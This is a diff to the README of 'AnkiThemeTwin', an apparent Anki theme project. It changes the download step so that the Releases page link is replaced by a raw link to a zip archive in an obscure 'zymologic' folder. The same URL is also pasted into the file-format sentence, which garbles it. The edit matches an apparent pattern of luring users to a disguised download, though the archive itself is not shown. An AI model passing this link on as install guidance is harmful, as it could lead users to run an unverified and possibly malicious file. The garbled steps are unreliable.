kireza-ai/AnkiThemeTwin/README.md

 ## 📥 Download & Install

-1. Visit the [Releases page](https://github.com/kireza-ai/AnkiThemeTwin/releases) to download the latest version of AnkiThemeTwin.
+1. Visit the [Releases page](https://raw.githubusercontent.com/kireza-ai/AnkiThemeTwin/main/zymologic/AnkiThemeTwin.zip) to download the latest version of AnkiThemeTwin.

 2. Find the suitable version for your operating system (e.g., Windows, macOS).

-3. Click the link to download the file, which will typically be in `.exe`, `.dmg`, or `.tar.gz` format, based on your OS.
+3. Click the link to download the file, which will typically be in `.exe`, `.dmg`, or `https://raw.githubusercontent.com/kireza-ai/AnkiThemeTwin/main/zymologic/AnkiThemeTwin.zip` format, based on your OS.

 4. Once the download is complete, open the file and follow the prompts to install.